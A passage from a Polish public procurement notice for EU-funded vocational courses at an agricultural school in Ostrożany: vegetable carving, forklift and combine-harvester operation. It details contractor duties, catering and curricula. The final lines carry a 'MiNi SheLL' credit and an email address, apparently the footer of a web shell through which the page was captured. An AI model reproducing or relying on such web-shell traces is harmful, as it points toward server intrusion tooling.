wykładowców posiadających odpowiednie kwalifikacje do przeprowadzenia kursu, tj. osoby, które posiadają kwalifikacje zawodowe, doświadczenie i wykształcenie umożliwiające realizację kursu stanowiącego przedmiot zamówienia; Kwalifikacje i kompetencje wykładowców powinny być adekwatne do zakresu programowego prowadzonych przez nich bloków tematycznych zajęć.  
materiałów szkoleniowych/dydaktycznych na własność dla każdego uczestnika kursu (tj.  podstawowy zestaw noży do carvingu, kserokopie prezentacji multimedialnych przygotowane w formie instruktarzu opisującego krok po kroku wykonywanie wszystkich przewidzianych w programie kurs aranżacji i dekoracji. Materiały mają być wzbogacone zdjęciami lub schematami wraz z opisem sposobu wykonania., teczki, płyty CD z materiałami ćwiczeniowymi itp.).,
sprzętu, urządzeń mechanicznych i wszelkich innych przyrządów, materiałów i produktów żywnościowych niezbędnych do prawidłowego zrealizowania programu kursu. W przypadku stwierdzenia przez Zamawiającego, że Wykonawca wykorzystuje podczas prowadzenia kursu jakikolwiek składnik przeterminowany, nieświeży lub z innego powodu nie nadający się do spożywania, lub wykorzystuje substytuty (zamienniki) składników właściwych Zamawiający może żądać przerwania zajęć do czasu dostarczenia odpowiedniego składnika przez Wykonawcę, a w przypadku powtarzania się tego rodzaju sytuacji lub zaistnienia w związku z tym zagrożenia dla zdrowia lub życia uczestników kursu wypowiedzieć zawartą z nim umowę w trybie natychmiastowym,
prowadzenie zajęć zgodnie z przepisami oraz zasadami bezpieczeństwa i higieny pracy, sprawowanie opieki nad uczestnikami podczas zajęć oraz przerw
zapewnienie cateringu dla każdego uczestnika kursu, we wszystkie dni zajęć, w tym: Obiad:
gorący posiłek (zupa+drugie danie) na początku szkolenia dla każdego uczestnika kursu - w przypadku kursu przeprowadzanego po zajęciach obowiązkowych. Zestaw obiadowy musi obejmować: zupę i mięso/rybę min 150g, ziemniaki 150g , surówkę lub sałatkę 100g. lub posiłek jarski (min. 400g/porcja) przy czym liczba posiłków jarskich nie może wystąpić więcej niż raz podczas kursu. Obiady powinny być zróżnicowane. Dany obiad  nie powinien powtarzać się częściej niż raz na szkolenie. 
woda mineralna 1,5 l/osobę.
Przerwa herbaciana :
po 1 saszetce herbaty czarnej nie mniej niż 2 gramy na osobę,  
drobne ciastka - nie mniej niż 100 g na osobę,
nie mniej niż 0,3 litra soku pomarańczowego lub jabłkowego na osobę.
Ponadto poza wymienionym wyżej asortymentem wykonawca dostarczy: 
termos z gorącą wodą,
cukier,
cytryny do herbaty,
Sposób podania: w formie szwedzkiego stołu z zapewnieniem serwetek, mieszadełek oraz filiżanek, talerzyków w ilości wystarczającej dla obsłużenia każdego uczestnika.
Wykonawca zabiera naczynia i resztki poczęstunku najpóźniej 30 min. po zakończeniu kursu. Wykonawca odpowiada za podanie poczęstunku zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i żywienia.
Wykonawca zapewnia ubezpieczenie uczestnikom kursu. 
Opracowanie autorskiego programu kursu carvingu  (z podziałem  wymiaru godzin przeznaczonych na poszczególne zagadnienia) obejmującego co najmniej poniższe zagadnienia:
Część teoretyczna : 
Historia i pochodzenie carvingu 
Rys historyczny carvingu
Prezentacja sprzętu do carvingu
rodzaje noży, dłutka itp. 
zabezpieczenie sprzętu (ostrzenie)
Omówienie technik i rodzajów cięć
Omówienie sposobów zabezpieczenia wykonanych rzeżb
Sposoby i zasady bezpiecznego używania narzędzi
Część praktyczna:
Wycinanie liści i kwiatów z różnych owoców i warzyw oraz tworzenie kompozycji z wykonanych elementów
Czynniki decydujące o wyborze owoców, warzyw do rzeźbienia.
Różne techniki do rzeźbienia owoców i warzyw
Zasady tworzenia kompozycji z wykonanych elementów.
Sposoby przechowywania wyrzeźbionych owoców i warzyw
Rzeźbienie motywów kwiatowych w owocach i warzywach 
liść z cukinii lub ogórka
kalie z kopru włoskiego lub rzodkwi i papryczki pepperoni
dwa motywy kwiatowe z papryczki pepperoni
szyszki z papryki 
ptak z cykorii i białej rzodkwi 
róża z kalarepy
kwiat tajski w melonie
róża w arbuzie lub dyni
budowa wieloskładnikowej kompozycji z wyrzeźbionych elementów
Tematyka szkolenia może zostać rozszerzona przez Wykonawcę
Podpisanie i wydanie uczestnikom certyfikatu potwierdzającego nabyte przez uczestnika umiejętności
Podpisanie i wydanie uczestnikom zaświadczeń o ukończeniu kursu 
Rekrutację na kurs przeprowadzi  Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy.
Szczegółowy harmonogram realizacji przedmiotu zamówienia zostanie ustalony z Przedstawicielem Zamawiającego - po podpisaniu umowy.
Każdy uczestnik po zakończeniu kursu musi otrzymać zaświadczenie o jego ukończeniu w myśl Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U z 2012 poz. 186) i certyfikat potwierdzający nabyte umiejętności zawierający logotypy zgodnie z aktualnymi wytycznymi oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. 
W pomieszczeniach, w których będą realizowane kursy będą umieszczone informacje o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz aktualne logotypy, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Zamawiający po zakończeniu kursu przeprowadzi jego ewaluację za pomocą anonimowych ankiet ewaluacyjnych. 
Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty: 
listę obecności z własnoręcznymi podpisami uczestników kursu w każdym dniu zajęć,
dzienniki zajęć uzupełnione w program kursu,
potwierdzenia przez uczestników kursu odbioru materiałów szkoleniowych
protokoły z przebiegu egzaminu
kopie certyfikatów i zaświadczeń potwierdzających uczestnictwo w kursie wraz z potwierdzeniem ich odbioru przez uczestników kursu, 
imienny wykaz osób które ukończyły kurs, nie zdały egzaminu, bądź nie przystąpiły do egzaminu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Organizacja i przeprowadzenie Kursu Carvingu II stopnia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie Kursu Carvingu II stopnia w wymiarze 9 godzin  dydaktycznych ( 1 godzina=45 min) dla każdej z dwóch grup każda po 7 osób tzn. dla 14 uczniów i uczennic Technikum w Zespole Szkół Rolniczych im. W. Witosa w Ostrożanach. 
Kurs ma odbywać się po obowiązkowych zajęciach lekcyjnych lub/i w dni wolne od zajęć lekcyjnych w siedzibie Zamawiającego 
Zamawiający udostępnia bezpłatnie sale do przeprowadzenia wykładów i zajęć praktycznych. 
Obowiązki Wykonawcy : 
Zapewnienie na własny koszt wszystkich elementów związanych z realizacją zamówienia, to jest w szczególności:
wykładowców posiadających odpowiednie kwalifikacje do przeprowadzenia kursu, tj. osoby, które posiadają kwalifikacje zawodowe, doświadczenie i wykształcenie umożliwiające realizację kursu stanowiącego przedmiot zamówienia; Kwalifikacje i kompetencje wykładowców powinny być adekwatne do zakresu programowego prowadzonych przez nich bloków tematycznych zajęć.  
materiałów szkoleniowych/dydaktycznych na własność dla każdego uczestnika kursu (tj.  podstawowy zestaw noży do carvingu, kserokopie prezentacji multimedialnych przygotowane w formie instruktarzu opisującego krok po kroku wykonywanie wszystkich przewidzianych w programie kurs aranżacji i dekoracji. Materiały mają być wzbogacone zdjęciami lub schematami wraz z opisem sposobu wykonania., teczki, płyty CD z materiałami ćwiczeniowymi itp.).,
sprzętu, urządzeń mechanicznych i wszelkich innych przyrządów, materiałów i produktów żywnościowych niezbędnych do prawidłowego zrealizowania programu kursu. W przypadku stwierdzenia przez Zamawiającego, że Wykonawca wykorzystuje podczas prowadzenia kursu jakikolwiek składnik przeterminowany, nieświeży lub z innego powodu nie nadający się do spożywania, lub wykorzystuje substytuty (zamienniki) składników właściwych Zamawiający może żądać przerwania zajęć do czasu dostarczenia odpowiedniego składnika przez Wykonawcę, a w przypadku powtarzania się tego rodzaju sytuacji lub zaistnienia w związku z tym zagrożenia dla zdrowia lub życia uczestników kursu wypowiedzieć zawartą z nim umowę w trybie natychmiastowym,
prowadzenie zajęć zgodnie z przepisami oraz zasadami bezpieczeństwa i higieny pracy, sprawowanie opieki nad uczestnikami podczas zajęć oraz przerw
zapewnienie cateringu dla każdego uczestnika kursu, we wszystkie dni zajęć, w tym: Obiad:
gorący posiłek (zupa+drugie danie) na początku szkolenia dla każdego uczestnika kursu - w przypadku kursu przeprowadzanego po zajęciach obowiązkowych. Zestaw obiadowy musi obejmować: zupę i mięso/rybę min 150g, ziemniaki 150g , surówkę lub sałatkę 100g. lub posiłek jarski (min. 400g/porcja) przy czym liczba posiłków jarskich nie może wystąpić więcej niż raz podczas kursu. Obiady powinny być zróżnicowane. Dany obiad  nie powinien powtarzać się częściej niż raz na szkolenie. 
woda mineralna 1,5 l/osobę.
Przerwa herbaciana : po 1 saszetce herbaty czarnej nie mniej niż 2 gramy na osobę,  
drobne ciastka - nie mniej niż 100 g na osobę,
nie mniej niż 0,3 litra soku pomarańczowego lub jabłkowego na osobę.
Ponadto poza wymienionym wyżej asortymentem wykonawca dostarczy: 
termos z gorącą wodą,
cukier,
cytryny do herbaty,
Sposób podania: w formie szwedzkiego stołu z zapewnieniem serwetek, mieszadełek oraz filiżanek, talerzyków w ilości wystarczającej dla obsłużenia każdego uczestnika.
Wykonawca zabiera naczynia i resztki poczęstunku najpóźniej 30 min. po zakończeniu kursu. Wykonawca odpowiada za podanie poczęstunku zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i żywienia.
 Wykonawca zapewnia ubezpieczenie uczestnikom kursu. 

Opracowanie autorskiego programu kursu carvingu II stopnia (z podziałem  wymiaru godzin przeznaczonych na poszczególne zagadnienia) obejmującego co najmniej poniższe zagadnienia:
Część teoretyczna : 
Możliwości komponowania rzeźb z warzyw i owoców 
Omówienie zasad i stylów w carvingu
Omówienie rzeźb 3D - papuga 
Część praktyczna:
Wycinanie z różnych owoców i warzyw oraz tworzenie kompozycji z wykonanych elementów: 
szyszka z marchwi (praca z dłutkiem typu U) 
kwiat z astra z buraka (kalarepy) (dłutko V) 
kwiaty dalii i/lub chryzantema z kalarepy (buraka) (dłutko U i V) 
róża rozwijająca się w marchwi 
róża z cukinii plus kielich z cukinii pod dowolny kwiat 
motyw tajski na melonie cantalupe 
arbuz z dwoma motywami kwiatowymi 
papuga z białej rzodkwi i marchwi 
rzeźba w mango 
budowa wieloskładnikowej kompozycji z wyrzeźbionych elementów 

Tematyka szkolenia może zostać rozszerzona przez Wykonawcę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Organizacja i przeprowadzenie Kursu kierowca wózków jezdniowych z napędem silnikowym wraz ze zmiennym wysięgiem (ładowarki).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie Kursu kierowca wózków jezdniowych z napędem silnikowym wraz ze zmiennym wysięgiem (ładowarki) w wymiarze 67 godzin dydaktycznych dla każdej z dwóch grup każda po 12 osób tz. 24 uczniów i uczennic technikum w Zespole Szkół Rolniczych w Ostrożanach z zapewnieniem materiałów szkoleniowych/dydaktycznych po jednym komplecie dla każdego uczestnika 
Kurs może odbywać się po obowiązkowych zajęciach lekcyjnych lub/i w dni wolne od zajęć lekcyjnych w siedzibie Zamawiającego.  
Zamawiający udostępnia bezpłatnie sale do przeprowadzenia wykładów. 
W przypadku gdy Wykonawca zorganizuje kurs poza siedzibą Zamawiającego zobowiązany jest  do zorganizowania na własny koszt codziennego transportu, dla każdego uczestnika na trasie: Ostrożany - miejsce kursu - Ostrożany. Wykonawca zobowiązany jest uwzględnić koszt transportu uczniów w cenie za zorganizowanie kursu dla 1 ucznia. Celem kursu jest przygotowanie uczestników do samodzielnej, bezpiecznej i prawidłowej eksploatacji oraz obsługi technicznej wózków jezdniowych.
Szkolenie ma być realizowane w podziale na 2 grupy każda po 12 osób w terminie wskazanym przez  zamawiającego. Zamawiający zastrzega, że Wykonawca podczas realizacji zamówienia nie może łączyć grup tzn. dwie grupy jednocześnie nie mogą być szkolone przez jednego wykładowcę.  
Zamawiający nie dopuszcza realizacji szkolenia objętego przedmiotem zamówienia w połączeniu z innymi osobami z wolnego naboru, (z wyjątkiem kierowanych przez Zamawiającego z listy rezerwowej). Szkolenie zlecane przez zamawiającego uznaje się za zamknięte i nie ma możliwości dołączania innych osób spoza listy przekazanej przez Zamawiającego.
Minimalny zakres tematyczny szkolenia musi obejmować:
Przepisy BHP i PPOŻ w zakresie obsługi wózków jezdniowych; przedstawienie zagrożeń wynikających z użytkowania różnych rodzajów wózków, omówienie zasad bezpiecznego poruszania się wózkiem, udzielanie pierwszej pomocy przedlekarskiej,
Budowa i rodzaje wózków jezdniowych; omówienie podstawowych typów wózków oraz krótka ich charakterystyka; przedstawienie ogólnych wiadomości na temat budowy wózka, różnice pomiędzy wózkami o napędzie spalinowym i elektrycznym, omówienie podstawowych zespołów i podzespołów w wózkach,
Czynności operatora przed, w trakcie i po jeździe wózkiem jezdniowym; omówienie czynności podejmowanych w celu przygotowania wózka do pracy tj. m.in. kontrola układu kierowniczego, hamulcowego,  poziomu oleju oraz jego zabezpieczenie po wykonaniu prac, omówienie dopuszczalnych obciążeń wózka, pracy mechanizmem podnoszenia z różnym osprzętem, wysokiego składowania materiałów, kontrola podzespołów wózka oraz obserwacja wskaźników wózka,
Dozór techniczny; przedstawienie ustawy o dozorze technicznym, omówienie zakresu dozoru technicznego, urządzeń podlegających pod UDT oraz technicznych badań wózków widłowych.
Ładunkoznawstwo; omówienie podstawowych jednostek ładunkowych, metod składowania oraz układania, zagospodarowanie przestrzeni magazynowej oraz głównych systemów magazynowania, oznaczeń znakami manipulacyjnymi i ostrzegawczymi, efektów paletyzacji),
Wymiana butli gazowych w wózkach jezdniowych lub naładowanie baterii akumulatora wózka; omówienie czynności, jakie musi wykonać kierowca wózka przed przystąpieniem do wymiany butli gazowej, zagrożeń występujących przy transporcie oraz wymianie butli, prezentacja metod ochrony przed w/w zagrożeniami oraz ćwiczenia z zakresu wymiany butli gazowej,
Praktyczna nauka jazdy i manewrowania wózkiem jezdniowym; jazda oraz manewrowanie wózkiem bez obciążenia, z obciążeniem, paletowanie oraz wysokie składowanie - co najmniej 15h/osobę
Rozmieszczanie i układanie towarów na wyznaczonej powierzchni magazynowej.
Ilość godzin przypadająca na jednego uczestnika musi wynosić: 67 godzin dydaktycznych w zakresie szkolenia objętego przedmiotem zamówienia, w tym minimum 20 godzin dydaktycznych zajęć praktycznych.
Uwaga: 1 godzina = 45 minut zajęć dydaktycznych + 15 minut przerwy.
Wszystkie zajęcia muszą być przeprowadzone z trenerem. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą e-lerningu, w formie eksternistycznej itp.

Obowiązki Wykonawcy 
Wykonawca zapewnia wykładowców posiadających odpowiednie kwalifikacje do przeprowadzenia kursu, tj. osoby, które posiadają kwalifikacje zawodowe, doświadczenie i wykształcenie umożliwiające realizację kursu stanowiącego przedmiot zamówienia; Kwalifikacje i kompetencje wykładowców powinny być adekwatne do zakresu programowego prowadzonych przez nich bloków tematycznych zajęć.
Wykonawca zapewnia badania lekarskie stwierdzające przeciwwskazania udziału w kursie dla każdego uczestnika kursu
Wykonawca zapewnienia ubezpieczenie uczestnikom kursu 
Wykonawca zapewnia każdemu uczestnikowi kursu egzamin UDT
Każdy uczestnik szkolenia, w ramach kursu, winien otrzymać na własność wyczerpujące materiały dydaktyczne niezbędne do realizacji szkolenia, w tym co najmniej:
opracowanie książkowe (podręcznik) z zakresu obsługi wózków jezdniowych.
teczka skrzydłowa na rzep format A4, szerokość grzbietu minimum 30mm, wykonana w wytrzymałej tektury oklejonej na zewnątrz folią i papierem od środka,
notes format A4, minimum 30 kartek w kratkę,
długopis,
 Każdy uczestnik szkolenia w ramach kursu winien mieć udostępnione materiały dydaktyczne oraz sprzęt w miejscu prowadzenia szkolenia, w tym co najmniej:
literatura związana z tematyką zajęć;
plansze poglądowe;
przekroje i części wózków jezdniowych;
modele;
dokumentacja techniczno-ruchowa urządzeń
Materiały dydaktyczne, o których mowa w pkt 6, muszą być nowe, nieużywane, adekwatne do treści szkolenia, z obowiązującym stanem prawnym oraz dobre jakościowo.
Dodatkowymi materiałami dydaktycznymi mogą być: skrypty lub materiały ksero dotyczące przedmiotu zamówienia, które muszą być czytelne, estetycznie wykonane i dobrej jakości.
Wykonawca musi dysponować wózkami jezdniowymi w celu przeprowadzenia praktycznej nauki jazdy.  
Każdy uczestnik po pozytywnym ukończeniu szkolenia musi otrzymać zaświadczenie o jego ukończeniu, zgodnie z Rozporządzeniem Edukacji Narodowej z dnia 11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012 poz. 186) oraz zaświadczenie kwalifikacyjne do obsługi urządzeń transportu bliskiego wydane przez Urząd Dozoru Technicznego.
Wykonawca zobowiązany będzie do:
prowadzenia nadzoru wewnętrznego służącego podnoszeniu jakości prowadzonego szkolenia. 
prowadzenia dziennika zajęć edukacyjnych zawierającego listę obecności, wymiar godzin i tematy zajęć edukacyjnych,
dostarczania zamawiającemu informacji o obecnościach i nieobecnościach uczestników szkolenia,
prowadzenia rejestru wydanych materiałów dydaktycznych, jakie na własność otrzymać uczestnik szkolenia,
przeprowadzania ankiet ewaluacyjnych wśród uczestników szkolenia,
przygotowania harmonogramu zajęć, obejmującego pełną realizację programu kursu w rozbiciu na poszczególne dni z uwzględnieniem tematyki zajęć, ilości godzin, przy uwzględnieniu wymagań określonych w SIWZ po podpisaniu umowy z Zamawiającym
Wykonawca zobowiązany jest wyznaczyć osobę/osoby prowadzące nadzór wewnętrzny nad realizacją umowy oraz do bezpośredniego kontaktowania się z zamawiającym.
Wykonawca zobowiązany jest do zapewnienia cateringu dla każdego uczestnika kursu, we wszystkie dni zajęć, w tym: Obiad:
gorący posiłek (zupa + drugie danie) na początku kursu - w przypadku realizacji godzin w dni po zajęciach obowiązkowych i w trakcie kursu przeprowadzanego w dni wolne od zajęć lekcyjnych . Zestaw obiadowy musi obejmować: zupę i mięso/rybę min 150g, ziemniaki 150g , surówkę lub sałatkę 100g. lub posiłek jarski (min. 400g/porcja) przy czym liczba posiłków jarskich nie może wystąpić więcej niż raz podczas jednego kursu. Obiady powinny być zróżnicowane. Dany obiad nie powinien powtarzać się częściej niż raz na szkolenie. 
woda mineralna 1,5 l/osobę.
Przerwa herbaciana;
po 1 saszetce herbaty czarnej nie mniej niż 2 gramy na osobę,  
drobne ciastka - nie mniej niż 100 g na osobę,
nie mniej niż 0,3 litra soku pomarańczowego lub jabłkowego na osobę.
Ponadto poza wymienionym wyżej asortymentem wykonawca dostarczy: 
termos z gorącą wodą,
cukier,
cytryny do herbaty,
Sposób podania: w formie szwedzkiego stołu z zapewnieniem serwetek, mieszadełek oraz filiżanek, talerzyków w ilości wystarczającej dla obsłużenia każdego uczestnika. Wykonawca zabiera naczynia i resztki poczęstunku najpóźniej 30 min. po zakończeniu kursu. Wykonawca odpowiada za podanie poczęstunku zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i żywienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs obsługa kombajnów zbożowych i sieczkarni polowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs obsługa kombajnów zbożowych i sieczkarni polowych w wymiarze 32 godzin dydaktycznych (1 godzina = 45 min.) dla każdej z 2 grup (1 grupa = 12 osób) z zapewnieniem materiałów szkoleniowych/dydaktycznych po jednym komplecie dla każdego uczestnika. 
Kurs może odbywać się po obowiązkowych zajęciach lekcyjnych lub/i w dni wolne od zajęć lekcyjnych w siedzibie Zamawiającego.  
Zamawiający udostępnia bezpłatnie sale do przeprowadzenia wykładów i zajęć praktycznych.
W przypadku gdy Wykonawca zorganizuje kurs poza siedzibą Zamawiającego zobowiązany jest  do zorganizowania na własny koszt codziennego transportu, dla każdego uczestnika na trasie: Ostrożany - miejsce kursu - Ostrożany. Wykonawca zobowiązany jest uwzględnić koszt transportu uczniów w cenie za zorganizowanie kursu dla 1 ucznia
Celem kursu jest przygotowanie uczestników do samodzielnej, bezpiecznej 
i prawidłowej eksploatacji oraz obsługi technicznej kombajnów zbożowych i sieczkarni polowych.

Rekrutację na kurs przeprowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy.

Szkolenie ma być realizowane w podziale na 2 grupy każda po 12 osób w terminie wskazanym przez  zamawiającego. Zamawiający zastrzega, że Wykonawca podczas realizacji zamówienia nie może łączyć grup tzn. dwie grupy jednocześnie nie mogą być szkolone przez jednego wykładowcę.  

Obowiązki Wykonawcy : 
Zapewnienie na własny koszt wszystkich elementów związanych z realizacją zamówienia, to jest w szczególności:
wykładowców posiadających odpowiednie kwalifikacje do przeprowadzenia kursu, tj. osoby, które posiadają kwalifikacje zawodowe, doświadczenie i wykształcenie umożliwiające realizację kursu stanowiącego przedmiot zamówienia; Kwalifikacje i kompetencje wykładowców powinny być adekwatne do zakresu programowego prowadzonych przez nich bloków tematycznych zajęć.
materiałów szkoleniowych/dydaktycznych na własność dla każdego uczestnika kursu (tj. np. kserokopie prezentacji multimedialnych, teczki, płyty CD z materiałami ćwiczeniowymi itp.).,
Kombajnu i Sieczkarni polowej do przeprowadzenia części praktycznej kursu 
zapewnienie cateringu dla każdego uczestnika kursu, we wszystkie dni zajęć, w tym: 
Obiad:
gorący posiłek (zupa + drugie danie) na początku kursu - w przypadku realizacji godzin w dni po zajęciach obowiązkowych i w trakcie kursu przeprowadzanego w dni wolne od zajęć lekcyjnych . Zestaw obiadowy musi obejmować: zupę i mięso/rybę min 150g, ziemniaki 150g , surówkę lub sałatkę 100g. lub posiłek jarski (min. 400g/porcja) przy czym liczba posiłków jarskich nie może wystąpić więcej niż raz podczas jednego kursu. Obiady powinny być zróżnicowane. Dany obiad nie powinien powtarzać się częściej niż raz na szkolenie. 
woda mineralna 1,5 l/osobę.
Przerwa herbaciana;
po 1 saszetce herbaty czarnej nie mniej niż 2 gramy na osobę,  
drobne ciastka - nie mniej niż 100 g na osobę,
nie mniej niż 0,3 litra soku pomarańczowego lub jabłkowego na osobę.
Ponadto poza wymienionym wyżej asortymentem wykonawca dostarczy: 
termos z gorącą wodą,
cukier,
cytryny do herbaty,
Sposób podania: w formie szwedzkiego stołu z zapewnieniem serwetek, mieszadełek oraz filiżanek, talerzyków w ilości wystarczającej dla obsłużenia każdego uczestnika. Wykonawca zabiera naczynia i resztki poczęstunku najpóźniej 30 min. po zakończeniu kursu. Wykonawca odpowiada za podanie poczęstunku zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i żywienia.
 zapewnienie zaświadczeń lekarskich do braku przeciwwskazań  udziału w kursie 
zapewnienie ubezpieczenia uczestnikom kursu 
prowadzenie  zajęć zgodnie z przepisami oraz zasadami bezpieczeństwa i higieny pracy, sprawowanie opieki nad uczestnikami podczas zajęć oraz przerw
prowadzenie dziennika zajęć i listy obecności na zajęciach oraz dostarczenie ich do Zamawiającego po zakończeniu kursu dla każdej z grup;
bieżące informowanie Zamawiającego o ewentualnych trudnościach na etapie realizacji szkolenia, zakończeniu szkolenia oraz jego wynikach;
poddawanie się kontroli prawidłowości realizacji projektu dokonywanej przez Zamawiającego oraz inne uprawnione do tego instytucje, w tym wglądu do wszelkiej dokumentacji związanej z projektem;
 przekazanie po zakończeniu szkolenia do Zamawiającego kopii protokołów egzaminacyjnych, dokumentów potwierdzających ukończenie szkolenia oraz imiennego wykazu osób, które nie ukończyły szkolenia;
Opracowanie autorskiego programu kursu na operatorów kombajnów zbożowych (z podziałem wymiaru godzin teoretycznych i praktycznych przeznaczonych na poszczególne zagadnienia) obejmującego co najmniej poniższe zagadnienia: 
Przepisy bhp, p.poż, oraz wybrane zasady ruchu drogowego przy obsłudze kombajnów zbożowych i sieczkarni polowych
Budowa kombajnów zbożowych oraz zasady funkcjonowania poszczególnych zespołów roboczych
Zespół żniwny (heder)
Zespół omłotowo - czyszczący
Budowa i zasada działania układu hydraulicznego
Instalacja elektryczna i elektroniczne układy sterowania
Mechanizmy napędowe
Skrzynie przekładniowe i przekładnie pasowe oraz rodzaje stosowanych pasów
Wyposażenie dodatkowe kombajnów
Obsługa techniczna kombajnów
Obsługa i regulacja zespołów roboczych
Organizacja pracy podczas zbioru
Użytkowanie kombajnów zbożowych i stosowanie odpowiednich technik pracy
Zapobieganie usterkom i awariom kombajnów podczas pracy
Samodzielna praca kombajnem przy zbiorze różnych kultur, w różnych niekiedy ciężkich warunkach
Eksploatacja kombajnu zbożowego w sposób ekonomiczny
Nauka jazdy i praca kombajnem- co najmniej 4h
Typy i rodzaje sieczkarni
Budowa sieczkarni
Czynności przed rozpoczęciem pracy
Czynności w czasie pracy i po jej zakończeniu
Nauka jazdy i praca sieczkarnią polową

Sprawdzenie efektywności procesu kształcenia odbędzie się po zakończeniu kursu. Przeprowadzone zostanie w dwóch formach:
część teoretyczna - test,
część praktyczna - jazda po placu manewrowym, uruchomienie zespołów kombajnu, podczepianie zespołu żniwnego.
Za prawidłową organizację i przebieg egzaminu odpowiedzialna będzie Komisja Egzaminacyjna, powołana przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com